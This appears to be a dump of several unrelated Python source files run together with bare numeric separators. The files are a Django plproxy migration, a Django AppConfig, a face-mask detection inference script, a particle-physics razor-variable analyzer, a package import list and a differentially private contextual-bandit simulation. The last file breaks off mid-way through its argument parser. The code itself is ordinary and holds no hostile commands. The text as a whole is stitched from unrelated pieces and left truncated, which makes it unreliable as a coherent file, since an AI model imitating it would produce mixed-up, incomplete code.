from django.conf import settings
from django.db import migrations

from corehq.sql_db.config import plproxy_standby_config
from corehq.sql_db.management.commands.configure_pl_proxy_cluster import (
    get_drop_server_sql,
    get_sql_to_create_pl_proxy_cluster,
)
from corehq.sql_db.operations import RawSQLMigration
from corehq.util.django_migrations import noop_migration

migrator = RawSQLMigration(('corehq', 'sql_proxy_standby_accessors', 'sql_templates'), {
    'PL_PROXY_CLUSTER_NAME': settings.PL_PROXY_CLUSTER_NAME
})


def create_update_pl_proxy_config():
    if not plproxy_standby_config or not (settings.UNIT_TESTING and settings.USE_PARTITIONED_DATABASE):
        return noop_migration()

    sql_statements = get_sql_to_create_pl_proxy_cluster(plproxy_standby_config)
    drop_server_sql = get_drop_server_sql(plproxy_standby_config.cluster_name)
    return migrations.RunSQL('\n'.join(sql_statements), drop_server_sql)


class Migration(migrations.Migration):

    dependencies = []

    operations = [
        migrations.RunSQL(
            'CREATE EXTENSION IF NOT EXISTS plproxy',
            'DROP EXTENSION plproxy'
        ),
        migrations.RunSQL(
            'CREATE EXTENSION IF NOT EXISTS hashlib',
            'DROP EXTENSION hashlib'
        ),
        create_update_pl_proxy_config(),
        migrator.get_migration('get_replication_delay.sql'),
    ]
438740
from django.apps import AppConfig


class AppConfig(AppConfig):
    pass


class CustomAppConfig(AppConfig):
    """
    This class may be used to set up configuration for scalable
    components and tools.
    """
    name = 'custom'
438752
import argparse
from pathlib import Path
from typing import Dict

import pandas as pd
import torch
import torch.distributed as dist
import torch.nn.parallel
import torch.utils.data
import torch.utils.data.distributed
import yaml
from albumentations.core.serialization import from_dict
from iglovikov_helper_functions.config_parsing.utils import object_from_dict
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm

from facemask_detection.dataloader import FaceMaskTestDataset
from facemask_detection.utils import load_checkpoint


def get_args():
    parser = argparse.ArgumentParser()
    arg = parser.add_argument
    arg("-i", "--input_path", type=Path, help="Path with images.", required=True)
    arg("-c", "--config_path", type=Path, help="Path to config.", required=True)
    arg("-o", "--output_path", type=Path, help="Path to save jsons.", required=True)
    arg("-b", "--batch_size", type=int, help="batch_size", default=2)
    arg("-j", "--num_workers", type=int, help="num_workers", default=12)
    arg("-w", "--weight_path", type=str, help="Path to weights.", required=True)
    arg("--world_size", default=-1, type=int, help="number of nodes for distributed training")
    arg("--local_rank", default=-1, type=int, help="node rank for distributed training")
    arg("--fp16", action="store_true", help="Use fp16")
    return parser.parse_args()


def main():
    args = get_args()
    torch.distributed.init_process_group(backend="nccl")

    with open(args.config_path) as f:
        hparams = yaml.load(f, Loader=yaml.SafeLoader)

    hparams.update({"json_path": args.output_path, "local_rank": args.local_rank, "fp16": args.fp16})

    device = torch.device("cuda", args.local_rank)

    model = object_from_dict(hparams["model"])
    model = model.to(device)

    if args.fp16:
        model = model.half()

    corrections: Dict[str, str] = {"model.": ""}
    checkpoint = load_checkpoint(file_path=args.weight_path, rename_in_layers=corrections)
    model.load_state_dict(checkpoint["state_dict"])

    model = torch.nn.parallel.DistributedDataParallel(
        model, device_ids=[args.local_rank], output_device=args.local_rank
    )

    file_paths = []
    for regexp in ["*.jpg", "*.png", "*.jpeg", "*.JPG"]:
        file_paths += sorted(x for x in tqdm(args.input_path.rglob(regexp)))

    dataset = FaceMaskTestDataset(file_paths, transform=from_dict(hparams["test_aug"]))

    sampler = DistributedSampler(dataset, shuffle=False)

    dataloader = torch.utils.data.DataLoader(
        dataset,
        batch_size=args.batch_size,
        num_workers=args.num_workers,
        pin_memory=True,
        shuffle=sampler is None,
        drop_last=False,
        sampler=sampler,
    )

    prediction = predict(dataloader, model, hparams, device)

    prediction_list = [torch.zeros_like(prediction) for _ in range(dist.get_world_size())]
    dist.all_gather(prediction_list, prediction)

    if dist.get_rank() == 0:
        with torch.no_grad():
            predictions = torch.cat(prediction_list, dim=1).reshape(-1).cpu().numpy()[: len(dataset)]

        df = pd.DataFrame({"file_path": file_paths, "predictions": predictions})
        df.to_csv(args.output_path, index=False)


def predict(dataloader, model, hparams, device):
    model.eval()

    if hparams["local_rank"] == 0:
        loader = tqdm(dataloader)
    else:
        loader = dataloader

    result = []

    with torch.no_grad():
        for batch in loader:
            images = batch["image"]  # images that are rescaled and padded

            if hparams["fp16"]:
                images = images.half()

            prediction = model(images.to(device))
            result += [torch.sigmoid(prediction)]

    return torch.cat(result)


if __name__ == "__main__":
    main()
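# A hedged invocation sketch for the inference script above (the file name
# `inference.py` is an assumption): the NCCL process group expects one process
# per GPU, launched with the older-style torch launcher, which supplies the
# --local_rank argument that the argparse definition above consumes:
#
#   python -m torch.distributed.launch --nproc_per_node=2 inference.py \
#       -i /data/images -c config.yaml -o predictions.csv -w weights.ckpt --fp16
#
# All the paths shown are placeholders for illustration.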
438762
import operator
import itertools
import copy
from math import *

from ROOT import std
from ROOT import TLorentzVector, TVector3, TVectorD

from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer
from PhysicsTools.HeppyCore.framework.event import Event
from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters
from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle
from PhysicsTools.HeppyCore.utils.deltar import deltaR
from ROOT.heppy import Megajet
from ROOT.heppy import ReclusterJets

import ROOT
import os


class RazorAnalyzer( Analyzer ):

    def __init__(self, cfg_ana, cfg_comp, looperName ):
        super(RazorAnalyzer, self).__init__(cfg_ana, cfg_comp, looperName)

    def declareHandles(self):
        super(RazorAnalyzer, self).declareHandles()
        # genJets
        self.handles['genJets'] = AutoHandle('slimmedGenJets', 'std::vector<reco::GenJet>')

    def beginLoop(self, setup):
        super(RazorAnalyzer, self).beginLoop(setup)
        self.counters.addCounter('pairs')
        count = self.counters.counter('pairs')
        count.register('all events')

    def computeMR(self, ja, jb):
        A = ja.P()
        B = jb.P()
        az = ja.Pz()
        bz = jb.Pz()
        mr = sqrt((A + B)*(A + B) - (az + bz)*(az + bz))
        return mr

    def computeMTR(self, ja, jb, met):
        mtr = met.Vect().Mag()*(ja.Pt() + jb.Pt()) - met.Vect().Dot(ja.Vect() + jb.Vect())
        mtr = sqrt(mtr/2.)
        return mtr

    def computeR(self, ja, jb, met):
        mr = self.computeMR(ja, jb)
        mtr = self.computeMTR(ja, jb, met)
        r = 999999. if mr <= 0 else mtr/mr
        return r

    def makeRAZOR(self, event):
        # print '==> INSIDE THE PRINT MT2'
        # print 'MET=', event.met.pt()

        import array
        import numpy

        ## ===> <NAME>
        (met, metphi) = event.met.pt(), event.met.phi()
        metp4 = ROOT.TLorentzVector()
        metp4.SetPtEtaPhiM(met, 0, metphi, 0)

        objects40jc = [j for j in event.cleanJets if j.pt() > 40 and abs(j.eta()) < 2.5]

        #### get megajets (association method: default 1 = minimum sum of the invariant masses of the two megajets)
        if len(objects40jc) >= 2:

            pxvec = ROOT.std.vector(float)()
            pyvec = ROOT.std.vector(float)()
            pzvec = ROOT.std.vector(float)()
            Evec = ROOT.std.vector(float)()
            grouping = ROOT.std.vector(int)()

            for jet in objects40jc:
                pxvec.push_back(jet.px())
                pyvec.push_back(jet.py())
                pzvec.push_back(jet.pz())
                Evec.push_back(jet.energy())

            megajet = Megajet(pxvec, pyvec, pzvec, Evec, 1)

            pseudoJet1px = megajet.getAxis1()[0] * megajet.getAxis1()[3]
            pseudoJet1py = megajet.getAxis1()[1] * megajet.getAxis1()[3]
            pseudoJet1pz = megajet.getAxis1()[2] * megajet.getAxis1()[3]
            pseudoJet1energy = megajet.getAxis1()[4]

            pseudoJet2px = megajet.getAxis2()[0] * megajet.getAxis2()[3]
            pseudoJet2py = megajet.getAxis2()[1] * megajet.getAxis2()[3]
            pseudoJet2pz = megajet.getAxis2()[2] * megajet.getAxis2()[3]
            pseudoJet2energy = megajet.getAxis2()[4]

            pseudoJet1pt2 = pseudoJet1px*pseudoJet1px + pseudoJet1py*pseudoJet1py
            pseudoJet2pt2 = pseudoJet2px*pseudoJet2px + pseudoJet2py*pseudoJet2py

            if pseudoJet1pt2 >= pseudoJet2pt2:
                event.pseudoJet1_had = ROOT.TLorentzVector(pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy)
                event.pseudoJet2_had = ROOT.TLorentzVector(pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy)
            else:
                event.pseudoJet2_had = ROOT.TLorentzVector(pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy)
                event.pseudoJet1_had = ROOT.TLorentzVector(pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy)

            event.mr_had = self.computeMR(event.pseudoJet1_had, event.pseudoJet2_had)
            event.mtr_had = self.computeMTR(event.pseudoJet1_had, event.pseudoJet2_had, metp4)
            event.r_had = self.computeR(event.pseudoJet1_had, event.pseudoJet2_had, metp4)

        #### do same things for GEN
        if self.cfg_comp.isMC:
            (genmet, genmetphi) = event.met.genMET().pt(), event.met.genMET().phi()
            genmetp4 = ROOT.TLorentzVector()
            genmetp4.SetPtEtaPhiM(genmet, 0, genmetphi, 0)

            allGenJets = [x for x in self.handles['genJets'].product()]
            objects40jc_Gen = [j for j in allGenJets if j.pt() > 40 and abs(j.eta()) < 2.5]

            if len(objects40jc_Gen) >= 2:

                pxvec = ROOT.std.vector(float)()
                pyvec = ROOT.std.vector(float)()
                pzvec = ROOT.std.vector(float)()
                Evec = ROOT.std.vector(float)()
                grouping = ROOT.std.vector(int)()

                for jet in objects40jc_Gen:
                    pxvec.push_back(jet.px())
                    pyvec.push_back(jet.py())
                    pzvec.push_back(jet.pz())
                    Evec.push_back(jet.energy())

                megajet = Megajet(pxvec, pyvec, pzvec, Evec, 1)

                pseudoJet1px = megajet.getAxis1()[0] * megajet.getAxis1()[3]
                pseudoJet1py = megajet.getAxis1()[1] * megajet.getAxis1()[3]
                pseudoJet1pz = megajet.getAxis1()[2] * megajet.getAxis1()[3]
                pseudoJet1energy = megajet.getAxis1()[4]

                pseudoJet2px = megajet.getAxis2()[0] * megajet.getAxis2()[3]
                pseudoJet2py = megajet.getAxis2()[1] * megajet.getAxis2()[3]
                pseudoJet2pz = megajet.getAxis2()[2] * megajet.getAxis2()[3]
                pseudoJet2energy = megajet.getAxis2()[4]

                pseudoJet1pt2 = pseudoJet1px*pseudoJet1px + pseudoJet1py*pseudoJet1py
                pseudoJet2pt2 = pseudoJet2px*pseudoJet2px + pseudoJet2py*pseudoJet2py

                if pseudoJet1pt2 >= pseudoJet2pt2:
                    pseudoJet1_gen = ROOT.TLorentzVector(pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy)
                    pseudoJet2_gen = ROOT.TLorentzVector(pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy)
                else:
                    pseudoJet2_gen = ROOT.TLorentzVector(pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy)
                    pseudoJet1_gen = ROOT.TLorentzVector(pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy)

                event.mr_gen = self.computeMR(pseudoJet1_gen, pseudoJet2_gen)
                event.mtr_gen = self.computeMTR(pseudoJet1_gen, pseudoJet2_gen, genmetp4)
                event.r_gen = self.computeR(pseudoJet1_gen, pseudoJet2_gen, genmetp4)
            else:
                event.mr_gen = -999
                event.mtr_gen = -999
                event.r_gen = -999

        ## ===> full RAZOR (jets + leptons)
        objects10lc = [l for l in event.selectedLeptons if l.pt() > 10 and abs(l.eta()) < 2.5]
        if hasattr(event, 'selectedIsoCleanTrack'):
            objects10lc = [l for l in event.selectedLeptons if l.pt() > 10 and abs(l.eta()) < 2.5] + \
                          [t for t in event.selectedIsoCleanTrack]

        objects40j10lc = objects40jc + objects10lc
        objects40j10lc.sort(key=lambda obj: obj.pt(), reverse=True)

        if len(objects40j10lc) >= 2:

            pxvec = ROOT.std.vector(float)()
            pyvec = ROOT.std.vector(float)()
            pzvec = ROOT.std.vector(float)()
            Evec = ROOT.std.vector(float)()
            grouping = ROOT.std.vector(int)()

            for obj in objects40j10lc:
                pxvec.push_back(obj.px())
                pyvec.push_back(obj.py())
                pzvec.push_back(obj.pz())
                Evec.push_back(obj.energy())

            # for obj in objects_fullmt2:
            #     print "pt: ", obj.pt(), ", eta: ", obj.eta(), ", phi: ", obj.phi(), ", mass: ", obj.mass()

            #### get megajets (association method: default 1 = minimum sum of the invariant masses of the two megajets)
            megajet = Megajet(pxvec, pyvec, pzvec, Evec, 1)

            pseudoJet1px = megajet.getAxis1()[0] * megajet.getAxis1()[3]
            pseudoJet1py = megajet.getAxis1()[1] * megajet.getAxis1()[3]
            pseudoJet1pz = megajet.getAxis1()[2] * megajet.getAxis1()[3]
            pseudoJet1energy = megajet.getAxis1()[4]

            pseudoJet2px = megajet.getAxis2()[0] * megajet.getAxis2()[3]
            pseudoJet2py = megajet.getAxis2()[1] * megajet.getAxis2()[3]
            pseudoJet2pz = megajet.getAxis2()[2] * megajet.getAxis2()[3]
            pseudoJet2energy = megajet.getAxis2()[4]

            pseudoJet1pt2 = pseudoJet1px*pseudoJet1px + pseudoJet1py*pseudoJet1py
            pseudoJet2pt2 = pseudoJet2px*pseudoJet2px + pseudoJet2py*pseudoJet2py

            if pseudoJet1pt2 >= pseudoJet2pt2:
                event.pseudoJet1 = ROOT.TLorentzVector(pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy)
                event.pseudoJet2 = ROOT.TLorentzVector(pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy)
            else:
                event.pseudoJet2 = ROOT.TLorentzVector(pseudoJet1px, pseudoJet1py, pseudoJet1pz, pseudoJet1energy)
                event.pseudoJet1 = ROOT.TLorentzVector(pseudoJet2px, pseudoJet2py, pseudoJet2pz, pseudoJet2energy)

            ###

            event.mr = self.computeMR(event.pseudoJet1, event.pseudoJet2)
            event.mtr = self.computeMTR(event.pseudoJet1, event.pseudoJet2, metp4)
            event.r = self.computeR(event.pseudoJet1, event.pseudoJet2, metp4)

        #### do the razor with one or two b jets (medium CSV)
        if len(event.bjetsMedium) >= 2:

            bJet1 = ROOT.TLorentzVector(event.bjetsMedium[0].px(), event.bjetsMedium[0].py(),
                                        event.bjetsMedium[0].pz(), event.bjetsMedium[0].energy())
            bJet2 = ROOT.TLorentzVector(event.bjetsMedium[1].px(), event.bjetsMedium[1].py(),
                                        event.bjetsMedium[1].pz(), event.bjetsMedium[1].energy())

            event.mr_bb = self.computeMR(bJet1, bJet2)
            event.mtr_bb = self.computeMTR(bJet1, bJet2, metp4)
            event.r_bb = self.computeR(bJet1, bJet2, metp4)

            # print 'MR(2b)', event.mr_bb

        if len(event.bjetsMedium) == 1:

            objects40jcCSV = [j for j in event.cleanJets
                              if j.pt() > 40 and abs(j.eta()) < 2.5 and j.p4() != event.bjetsMedium[0].p4()]
            objects40jcCSV.sort(key=lambda l: l.btag('combinedInclusiveSecondaryVertexV2BJetTags'), reverse=True)

            if len(objects40jcCSV) > 0:
                bJet1 = ROOT.TLorentzVector(event.bjetsMedium[0].px(), event.bjetsMedium[0].py(),
                                            event.bjetsMedium[0].pz(), event.bjetsMedium[0].energy())
                bJet2 = ROOT.TLorentzVector(objects40jcCSV[0].px(), objects40jcCSV[0].py(),
                                            objects40jcCSV[0].pz(), objects40jcCSV[0].energy())

                event.mr_bb = self.computeMR(bJet1, bJet2)
                event.mtr_bb = self.computeMTR(bJet1, bJet2, metp4)
                event.r_bb = self.computeR(bJet1, bJet2, metp4)

                ## print 'MRbb(1b)', event.mr_bb

        ## ===> leptonic MR
        if not self.cfg_ana.doOnlyDefault:

            if len(event.selectedLeptons) >= 2:
                lep1 = ROOT.TLorentzVector(event.selectedLeptons[0].px(), event.selectedLeptons[0].py(),
                                           event.selectedLeptons[0].pz(), event.selectedLeptons[0].energy())
                lep2 = ROOT.TLorentzVector(event.selectedLeptons[1].px(), event.selectedLeptons[1].py(),
                                           event.selectedLeptons[1].pz(), event.selectedLeptons[1].energy())

                event.mr_lept = self.computeMR(lep1, lep2)
                event.mtr_lept = self.computeMTR(lep1, lep2, metp4)
                event.r_lept = self.computeR(lep1, lep2, metp4)

        ###

    def process(self, event):
        self.readCollections(event.input)

        event.mr_gen = -999
        event.mtr_gen = -999
        event.r_gen = -999
        event.mr_bb = -999
        event.mtr_bb = -999
        event.r_bb = -999
        event.mr_lept = -999
        event.mtr_lept = -999
        event.r_lept = -999
        event.mr_had = -999
        event.mtr_had = -999
        event.r_had = -999
        event.mr = -999
        event.mtr = -999
        event.r = -999
        event.pseudoJet1 = ROOT.TLorentzVector(0, 0, 0, 0)
        event.pseudoJet2 = ROOT.TLorentzVector(0, 0, 0, 0)

        ###

        self.makeRAZOR(event)

        # print 'variables computed: MR=', event.mr_had, 'R=', event.r, 'MTR=', event.mtr
        # print 'pseudoJet1 px=', event.pseudoJet1.px(), ' py=', event.pseudoJet1.py(), ' pz=', event.pseudoJet1.pz()
        # print 'pseudoJet2 px=', event.pseudoJet2.px(), ' py=', event.pseudoJet2.py(), ' pz=', event.pseudoJet2.pz()

        return True
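# A standalone, hedged re-implementation of the three razor variables computed
# by RazorAnalyzer above, using plain numpy instead of ROOT TLorentzVectors so
# the formulas can be checked in isolation. It relies on the MET four-vector
# having zero pz (as in SetPtEtaPhiM(met, 0, metphi, 0) above), which makes the
# 3-D dot product reduce to a 2-D one. The momenta below are made-up
# illustration values, not analysis data.
import numpy as np

def razor(p1, p2, met):
    """p1, p2: (px, py, pz) of the two megajets; met: (mex, mey)."""
    p1 = np.asarray(p1, float)
    p2 = np.asarray(p2, float)
    met = np.asarray(met, float)
    A, B = np.linalg.norm(p1), np.linalg.norm(p2)        # |p| of each megajet
    mr = np.sqrt((A + B) ** 2 - (p1[2] + p2[2]) ** 2)    # longitudinal-boost-invariant mass scale
    pt1, pt2 = np.linalg.norm(p1[:2]), np.linalg.norm(p2[:2])
    mtr = np.sqrt((np.linalg.norm(met) * (pt1 + pt2) - met @ (p1[:2] + p2[:2])) / 2.0)
    r = mtr / mr if mr > 0 else 999999.0                 # same fallback as computeR
    return mr, mtr, r

print(razor((100, 20, 50), (-90, -10, -40), (30, 5)))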
438769
from .resnet import ResidualNet, ConvResidualNet
from .unet import UNet
from .attention import ConvAttentionNet
from .mlp import MLP
from .conv import (
    SylvesterFlowConvEncoderNet,
    SylvesterFlowConvDecoderNet,
    infoGAN_decoder,
    infoGAN_encoder,
    ConvEncoder,
    simple_decoder,
    ConvDecoder,
    Conv2dSameSize,
    ModifiedConvEncoder,
)
438786
import os
import sys
import glob
import tqdm
import warnings
import argparse
import copy

import numpy as np
import pandas as pd

from itertools import product
from functools import partial
from math import sqrt, exp, pi, gamma, log
from multiprocessing import Pool, cpu_count

pdir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
sys.path.append(pdir)

from plotters import plotters
from utils import wrap_params, settings_dict


def run(random_seed, prefix, epsilon, n_action, time_horizon, dimension=20, echo_freq=100):
    np.random.seed(random_seed)

    T = time_horizon
    k = n_action
    d = dimension
    s = int(d/k)
    v = 1
    echo_freq = echo_freq
    delta = 0.1
    alpha = 0.1
    sigma = 6*sqrt(2*log(2.5/delta))/epsilon
    warm_up = int(3e3)
    I = np.eye(d)
    B = (exp(epsilon) + 1)/(exp(epsilon) - 1) * sqrt(pi) / 2 * d * gamma((d - 1)/2 + 1) / gamma(d/2 + 1)
    threshold = exp(epsilon)/(exp(epsilon) + 1)
    zeta = d*k/(sqrt(T)*1000)

    OLS_Vs = [np.zeros((d, d)) for _ in range(k)]
    OLS_Rs = [np.zeros((d, 1)) for _ in range(k)]
    SGD_Vs = [np.zeros((d, d)) for _ in range(k)]
    SGD_Rs = [np.zeros((d, 1)) for _ in range(k)]
    UCB_I = np.eye(d*k)
    UCB_Vs = np.zeros((d*k, d*k))
    UCB_Rs = np.zeros((d*k, 1))
    GLOC_I = np.eye(d*k)
    GLOC_Vs = np.zeros((d*k, d*k))
    GLOC_Rs = np.zeros((d*k, 1))

    def perturb(X, Y):
        noise_covariance = np.random.normal(0, sigma, size=X.shape)
        for i in range(len(noise_covariance)):
            for j in range(i):
                noise_covariance[i][j] = noise_covariance[j][i]
        noise_reward = np.random.normal(0, sigma, size=Y.shape)
        return noise_covariance, noise_reward

    def privacy_process(X, Y):
        noise_covariance, noise_reward = perturb(X, Y)
        noised_package = dict()
        X = X + noise_covariance
        Y = Y + noise_reward
        return X, Y

    # estimator
    init_theta = np.random.normal(0, 1, (d))
    init_theta /= sqrt(init_theta.T.dot(init_theta))
    init_theta = np.tile(init_theta, (d, k))
    theta_sgd = copy.deepcopy(init_theta)
    theta_ols = copy.deepcopy(init_theta)
    theta_ucb = np.random.normal(0, 1, (d*k, 1))
    theta_ucb /= sqrt(theta_ucb.T.dot(theta_ucb))
    theta_gloc = copy.deepcopy(theta_ucb)
    theta_gloc_h = copy.deepcopy(theta_ucb)

    # theta setting
    # theta = np.zeros((d, k))
    # for i in range(k):
    #     theta[i*s:(i+1)*s, i] = 1
    #     theta[:, i] = np.random.normal(0, sqrt(v)/3, (d))
    #     theta[:, i] /= sqrt(theta[:, i].T.dot(theta[:, i]))

    # theta setting 2
    theta = np.random.normal(0, 1, (d, k))
    for i in range(k):
        theta[:, i] /= sqrt(theta[:, i].T.dot(theta[:, i]))

    context = np.random.normal(0, 1, (d, 1))
    # context /= sqrt(context.T.dot(context))

    # iterator = tqdm.tqdm(range(T+1))
    iterator = range(T+1)

    times = list()
    est_errors_sgd = list()
    est_errors_ucb = list()
    est_errors_ols = list()
    est_errors_gloc = list()
    pseudo_regrets_sgd = list()
    pseudo_regrets_ucb = list()
    pseudo_regrets_ols = list()
    pseudo_regrets_gloc = list()
    pseudo_cum_regrets_sgd = list()
    pseudo_cum_regrets_ucb = list()
    pseudo_cum_regrets_ols = list()
    pseudo_cum_regrets_gloc = list()

    for t in iterator:
        record = dict()

        # For MAB contextual decision
        select_index_sgd = np.argmax([theta_sgd[:, i].T.dot(context) for i in range(k)])
        select_index_ols = np.argmax([theta_ols[:, i].T.dot(context) for i in range(k)])
        if t < warm_up:
            select_index_sgd = t % k
            select_index_ols = t % k

        # For linear contextual decision
        upsilon_t1 = sigma*sqrt(t)*(4*sqrt(d) + 2*log(2*T/alpha))   # t-1
        upsilon_t = sigma*sqrt(t+1)*(4*sqrt(d) + 2*log(2*T/alpha))  # t
        c_t1 = 2*upsilon_t1
        c_t = 2*upsilon_t
        beta = 2*sigma*sqrt(d*log(T)) + (sqrt(3*upsilon_t) + sigma*sqrt(d*(t+1)/upsilon_t))*d*log(T)
        linear_contexts = np.zeros((d*k, k))

        # ucb
        for i in range(k):
            linear_contexts[i*d:(i+1)*d, i] = context.ravel()
        try:
            temp_matrix = np.linalg.inv(UCB_Vs + c_t1 * UCB_I)
        except:
            temp_matrix = np.identity(d*k)
        action_values = []
        for i in range(linear_contexts.shape[1]):
            x = linear_contexts[:, i]
            UCB_value = theta_ucb.T.dot(x)[0] + beta*sqrt(x.T.dot(temp_matrix).dot(x))
            action_values.append(UCB_value)
        select_index_ucb = np.argmax(action_values)

        # gloc
        try:
            temp_matrix = np.linalg.inv(GLOC_Vs + c_t1 * GLOC_I)  # V_{t-1}, c_{t-1}
        except:
            temp_matrix = np.identity(d*k)
        action_values = []
        for i in range(linear_contexts.shape[1]):
            x = linear_contexts[:, i]
            GLOC_value = theta_gloc.T.dot(x)[0] + beta*sqrt(x.T.dot(temp_matrix).dot(x))
            action_values.append(GLOC_value)
        select_index_gloc = np.argmax(action_values)

        # return regret for sgd
        expected_reward_sgd = context.T.dot(theta[:, select_index_sgd])
        noise = np.random.normal(0, 0.05, size=(1, 1))
        reward_sgd = expected_reward_sgd + noise
        optimal_value = np.max([context.T.dot(theta[:, i]) for i in range(k)])
        pseudo_regret_sgd = optimal_value - expected_reward_sgd

        # return regret for ols
        expected_reward_ols = context.T.dot(theta[:, select_index_ols])
        noise = np.random.normal(0, 0.05, size=(1, 1))
        reward_ols = expected_reward_ols + noise
        # optimal_value = np.max([context.T.dot(theta[:, i]) for i in range(k)])
        pseudo_regret_ols = optimal_value - expected_reward_ols

        # return regret for UCB
        expected_reward_ucb = context.T.dot(theta[:, select_index_ucb])
        noise = np.random.normal(0, 0.05, size=(1, 1))
        reward_ucb = expected_reward_ucb + noise
        # optimal_value = np.max([context.T.dot(theta[:, i]) for i in range(k)])
        pseudo_regret_ucb = optimal_value - expected_reward_ucb

        # return regret for GLOC
        expected_reward_gloc = context.T.dot(theta[:, select_index_gloc])
        noise = np.random.normal(0, 0.05, size=(1, 1))
        reward_gloc = expected_reward_gloc + noise
        # optimal_value = np.max([context.T.dot(theta[:, i]) for i in range(k)])
        pseudo_regret_gloc = optimal_value - expected_reward_gloc

        # SGD update
        if t < warm_up:
            SGD_Xs = [np.zeros((d, d)) for _ in range(k)]
            SGD_Xs[select_index_sgd] = context.dot(context.T)
            SGD_Ys = [np.zeros((d, 1)) for _ in range(k)]
            SGD_Ys[select_index_sgd] = reward_sgd*context
            i = select_index_sgd
            SGD_Xs[i], SGD_Ys[i] = privacy_process(SGD_Xs[i], SGD_Ys[i])
            SGD_Vs[i] += SGD_Xs[i]
            SGD_Rs[i] += SGD_Ys[i]
            theta_sgd[:, i] = np.linalg.inv(SGD_Vs[i] + c_t * I).dot(SGD_Rs[i]).ravel()
        else:
            gradients = np.zeros((d*k))
            gradients[(select_index_sgd*d):((select_index_sgd+1)*d)] = \
                ((context.T.dot(theta_sgd[:, select_index_sgd]) - reward_sgd)*context).ravel()
            x = gradients
            if (x.T.dot(x) > 0):
                x = x/sqrt(x.T.dot(x)) if np.random.uniform() > (1/2 + sqrt(x.T.dot(x))/(2)) else -x/sqrt(x.T.dot(x))
            else:
                raise Exception("Sorry, x is a zero vector")
            prob = np.random.uniform()
            while True:
                z = np.random.normal(0, 1, (d*k, 1))
                z = z/sqrt(z.T.dot(z))*B
                if (((prob > threshold) and (z.T.dot(x) > 0)) or ((prob <= threshold) and (z.T.dot(x) <= 0))):
                    break
            eta = sqrt(k)*d/(200*(t+1))
            for i in range(k):
                theta_sgd[:, i] = theta_sgd[:, i] - eta*(z[(i*d):((i+1)*d)].ravel() + 0.00*theta_sgd[:, i])

        # OLS update
        OLS_Xs = [np.zeros((d, d)) for _ in range(k)]
        OLS_Xs[select_index_ols] = context.dot(context.T)
        OLS_Ys = [np.zeros((d, 1)) for _ in range(k)]
        OLS_Ys[select_index_ols] = reward_ols*context
        if t < warm_up:
            i = select_index_ols
            OLS_Xs[i], OLS_Ys[i] = privacy_process(OLS_Xs[i], OLS_Ys[i])
            OLS_Vs[i] += OLS_Xs[i]
            OLS_Rs[i] += OLS_Ys[i]
            theta_ols[:, i] = np.linalg.inv(OLS_Vs[i] + c_t * I).dot(OLS_Rs[i]).ravel()
        else:
            for i in range(k):
                OLS_Xs[i], OLS_Ys[i] = privacy_process(OLS_Xs[i], OLS_Ys[i])
                OLS_Vs[i] += OLS_Xs[i]
                OLS_Rs[i] += OLS_Ys[i]
                theta_ols[:, i] = np.linalg.inv(OLS_Vs[i] + c_t * I).dot(OLS_Rs[i]).ravel()

        # UCB Update
        X, Y = privacy_process(
            linear_contexts[:, select_index_ucb].reshape((-1, 1)).dot(linear_contexts[:, select_index_ucb].reshape((-1, 1)).T),
            reward_ucb*linear_contexts[:, select_index_ucb].reshape((-1, 1)))
        UCB_Vs += X
        UCB_Rs += Y
        theta_ucb = np.linalg.inv(UCB_Vs + c_t * UCB_I).dot(UCB_Rs)

        # GLOC Update
        linear_context = linear_contexts[:, [select_index_gloc]]
        X, Y = privacy_process(
            linear_context.T.dot(linear_context),
            linear_context.T.dot(theta_gloc_h)*linear_contexts[:, [select_index_gloc]])
        GLOC_Vs += X
        GLOC_Rs += Y
        theta_gloc = np.linalg.inv(GLOC_Vs + c_t * GLOC_I).dot(GLOC_Rs)
        nabla_h = (theta_gloc_h.T.dot(linear_context) - reward_gloc)*linear_context
        nabla_h += np.random.normal(0, 2*sigma, size=nabla_h.shape)
        theta_gloc_h -= zeta*nabla_h

        # Update next context
        context = np.random.normal(0, 1, (d, 1))

        # Records
        pseudo_regrets_sgd.append(pseudo_regret_sgd[0])
        pseudo_regrets_ols.append(pseudo_regret_ols[0])
        pseudo_regrets_ucb.append(pseudo_regret_ucb[0])
        pseudo_regrets_gloc.append(pseudo_regret_gloc[0])
        if (t % echo_freq == 0):
            times.append(t)
            est_errors_sgd.append(sum([np.linalg.norm(theta_sgd[:, [i]] - theta[:, [i]]) for i in range(k)]))
            est_errors_ols.append(sum([np.linalg.norm(theta_ols[:, [i]] - theta[:, [i]]) for i in range(k)]))
            est_errors_ucb.append(sum([np.linalg.norm(theta_ucb[i*d:(i+1)*d, :] - theta[:, [i]]) for i in range(k)]))
            est_errors_gloc.append(sum([np.linalg.norm(theta_gloc[i*d:(i+1)*d, :] - theta[:, [i]]) for i in range(k)]))
            pseudo_cum_regrets_sgd.append(np.sum(pseudo_regrets_sgd))
            pseudo_cum_regrets_ols.append(np.sum(pseudo_regrets_ols))
            pseudo_cum_regrets_ucb.append(np.sum(pseudo_regrets_ucb))
            pseudo_cum_regrets_gloc.append(np.sum(pseudo_regrets_gloc))

    df = pd.DataFrame({'time': times, 'sgdest': est_errors_sgd, 'ucbest': est_errors_ucb, 'glocest': est_errors_gloc,
                       'olsest': est_errors_ols, 'sgdr': pseudo_cum_regrets_sgd, 'ucbr': pseudo_cum_regrets_ucb,
                       'olsr': pseudo_cum_regrets_ols, 'glocr': pseudo_cum_regrets_gloc})
    df.to_csv(prefix + 'multi_param_nowarmup' + '|' + 'eps=' + str(epsilon) + '|' + 'n_action=' + str(k)
              + '|' + 'random_seed=' + str(random_seed) + '|.csv')
    return None


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
